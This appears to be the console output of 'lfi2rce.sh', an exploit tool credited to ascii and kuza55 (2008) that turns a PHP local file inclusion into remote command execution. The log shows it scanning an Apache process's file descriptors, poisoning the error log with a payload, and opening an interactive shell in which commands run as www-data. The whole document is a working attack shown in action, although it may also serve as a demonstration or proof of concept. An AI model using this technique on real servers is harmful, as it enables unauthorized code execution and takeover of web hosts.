$ sh lfi2rce.sh # lfi2rce redux # Local file inclusion to remote command execution redux # # (c) ascii and kuza55 2008 Info gathering.. Remote target is /usr/sbin/apache2-kstart (PID: 14152, FD table size: 32) FD 0 PHP Not a directory ??. FD 1 PHP Not a directory ??. FD 2 PHP Permission denied FD. FD 3 PHP Unexisting Device or Address FD. FD 4 PHP Permission denied FD. FD 5 PHP Permission denied FD. FD 6 PHP Permission denied FD. FD 7 Common format error log detected. FD 8 PHP Memory exhausted (Try again after a logrotate). FD 9 PHP Unexisting Device or Address FD. FD 10 PHP Unexisting File or Directory FD. FD 11 PHP Unexisting File or Directory FD. FD 12 PHP Unexisting File or Directory FD. FD 13 PHP Unexisting File or Directory FD. FD 14 PHP Unexisting File or Directory FD. FD 15 PHP Unexisting File or Directory FD. FD 16 PHP Unexisting File or Directory FD. FD 17 PHP Unexisting File or Directory FD. FD 18 PHP Unexisting File or Directory FD. FD 19 PHP Unexisting File or Directory FD. FD 20 PHP Unexisting File or Directory FD. FD 21 PHP Unexisting File or Directory FD. FD 22 PHP Unexisting File or Directory FD. FD 23 PHP Unexisting File or Directory FD. FD 24 PHP Unexisting File or Directory FD. FD 25 PHP Unexisting File or Directory FD. FD 26 PHP Unexisting File or Directory FD. FD 27 PHP Unexisting File or Directory FD. FD 28 PHP Unexisting File or Directory FD. FD 29 PHP Unexisting File or Directory FD. FD 30 PHP Unexisting File or Directory FD. FD 31 PHP Unexisting File or Directory FD. Select FD (0,31): 7 Select attack mode (1=access_log,2=error_log): 2 Going on FD 7 with mode 2! Testing.. (demo payload) verify.. (demo payload) ERROR attack mode verified and working! Injecting real payload.. Going interactive.. (to quit type EXIT) $ ls bHM= poc.php $ ls -la bHMgLWxh total 12 drwx------ 2 www-data www-data 4096 Jul 1 13:02 . drwx------ 12 www-data www-data 4096 Jul 1 13:02 .. -rw------- 1 www-data www-data 35 Jul 1 15:03 poc.php $ pwd cHdk /home/www.example.com/hack-lfi2rce_redux $